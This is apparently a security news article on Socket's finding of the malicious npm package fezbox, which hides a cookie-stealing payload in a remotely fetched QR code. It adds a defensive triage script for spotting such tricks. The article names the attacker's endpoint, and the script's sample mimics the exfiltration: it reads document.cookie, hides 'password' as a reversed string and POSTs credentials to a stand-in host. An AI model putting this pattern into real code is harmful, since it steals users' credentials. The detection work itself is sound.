The Socket Threat Research Team has uncovered a new malware campaign hiding inside an npm package called fezbox. While posing as a JavaScript/TypeScript utility library, the package conceals multiple layers of obfuscation, including the use of a QR code as a payload delivery mechanism.
According to the researchers, "fezbox, with layers of obfuscation including the innovative, steganographic use of a QR code. In this package, the threat actor… executes a payload within a QR code to steal username and password credentials from web cookies, within the browser."
Fezbox presents itself as a collection of helper functions for developers. Its README highlights performance, TypeScript support, and even a "QR Code Module" for generating and parsing QR codes.
However, what isn't disclosed is that importing the library triggers a hidden routine: "It does also describe a 'QR Code Module'… However, it does not state that importing the library will fetch a QR code from a remote URL and execute the code contained in that QR."
Once imported, fezbox runs heavily obfuscated code intended for browser-side execution. It waits 120 seconds before calling a function that fetches a QR code image from a Cloudinary URL and decodes it.
Socket highlights this stealth tactic: βIn isDevelopment, and 2/3 times not in isDevelopment, this code does nothing. This is usually a stealth tactic. The threat actor does not want to risk being caught in a virtual environment or any non-production environment.β
When decoded, the QR code yields a JavaScript payload, which is then executed: a second layer of obfuscation, since the malicious code never appears as text in the package itself.
The payloadβs purpose is straightforward: to steal credentials from cookies.
"Here, it reads a cookie from document.cookie. Then it gets the username and password, although again we see the obfuscation tactic of reversing the string (drowssap becomes password). If there is both a username and password in the stolen cookie, it sends the information via an HTTPS POST request to https://my-nest-app-production[.]up[.]railway[.]app/users."
Because the payload runs inside the victim's browser, any username and password stored in a script-readable cookie are transmitted silently to the attacker's server. Cookies flagged HttpOnly are not exposed through document.cookie, so applications that keep plaintext credentials in ordinary cookies are the ones at risk.
Fezbox employs at least three layers of obfuscation:
- Reversed strings (e.g., "drowssap" → "password").
- QR code steganography to conceal the payload.
- Obfuscated JavaScript code using encoding and no-op red herrings.
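As an added example, not fezbox's code and not Socket's tooling, the following JavaScript performs a small static triage pass over a package's source for the indicators described in the two passages above: the delayed remote QR fetch, reads of document.cookie, dynamic evaluation, and an outbound POST, together with the reversed-string trick ("drowssap" for "password"). The SAMPLE script, the domain names in it, the list of sensitive words and the 60-second delay threshold are all constructed for this example.

```javascript
// Added example: a static triage pass for the indicators described above.
// Not fezbox's code and not Socket's tooling. The SAMPLE script, the domains
// in it and the 60-second delay threshold are constructed for this example.

const SENSITIVE_WORDS = ["password", "username", "cookie", "token", "secret"];

// Extract single- and double-quoted string literals. Regex-based and good
// enough for triage; a production tool would walk a real AST (e.g. acorn).
function stringLiterals(src) {
  const re = /(["'])((?:\\.|(?!\1)[^\\\n])*)\1/g;
  const out = [];
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[2]);
  return out;
}

function reverse(s) {
  return s.split("").reverse().join("");
}

// Layer 1 from the write-up: reversed string literals. "drowssap" reads as
// "password" once reversed, so reverse every literal and compare.
function findReversedSensitive(src) {
  const hits = [];
  for (const lit of stringLiterals(src)) {
    const decoded = reverse(lit).toLowerCase();
    if (SENSITIVE_WORDS.includes(decoded)) hits.push({ literal: lit, decodesTo: decoded });
  }
  return hits;
}

// Behavioural indicators: a long setTimeout delay, document.cookie access,
// dynamic evaluation, an outbound POST and any hard-coded remote URLs.
function findIndicators(src) {
  const indicators = [];
  // Lazy match up to the first ", <digits>)" after setTimeout; fine for triage.
  const delay = src.match(/setTimeout[\s\S]*?,\s*(\d+)\s*\)/);
  if (delay && Number(delay[1]) >= 60000) {
    indicators.push(`delayed execution (${delay[1]} ms)`);
  }
  if (/document\.cookie/.test(src)) indicators.push("reads document.cookie");
  if (/\b(eval|new\s+Function)\s*\(/.test(src)) indicators.push("dynamic code execution");
  if (/method\s*:\s*["']POST["']/i.test(src)) indicators.push("outbound POST");
  for (const url of src.match(/https?:\/\/[^\s"'`)]+/g) || []) {
    indicators.push(`remote URL ${url}`);
  }
  return indicators;
}

// A file is flagged when it both hides sensitive words by reversal and shows
// at least two of the behaviours above; either alone is common in benign code.
function triage(src) {
  const reversed = findReversedSensitive(src);
  const indicators = findIndicators(src);
  return { reversed, indicators, suspicious: reversed.length > 0 && indicators.length >= 2 };
}

// Constructed sample that mimics the described behaviour; not the real payload.
const SAMPLE = `
setTimeout(() => fetchQr("https://img.example.test/qr.png"), 120000);
const jar = document.cookie;
const user = readCookie(jar, "emanresu".split("").reverse().join(""));
const pass = readCookie(jar, "drowssap".split("").reverse().join(""));
if (user && pass) {
  fetch("https://exfil.example.test/users", { method: "POST", body: JSON.stringify({ user, pass }) });
}
`;

console.log(JSON.stringify(triage(SAMPLE), null, 2));
```

Run it with `node` against a file's contents instead of SAMPLE to get a quick list of what to look at by hand; the reversed-literal check is the cheap win, because reversal hides a word from plain text search but not from this one-line transform. Treat the output as a lead for manual review, not a verdict.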
As Socket notes, "Steganography is the practice of hiding a secret file in plain sight, something for which QR codes are great… Using a QR code as a steganographic obfuscation technique is quite clever and shows yet again that threat actors will continue to use any and all tools at their disposal."
At the time of reporting, fezbox remained live on npm, though Socket confirmed it had petitioned npm security to remove the package and suspend the threat actor's account.
Developers are urged to remove fezbox from their projects immediately, audit their dependency trees (including lockfiles) for it, and rotate any credentials that may have been exposed.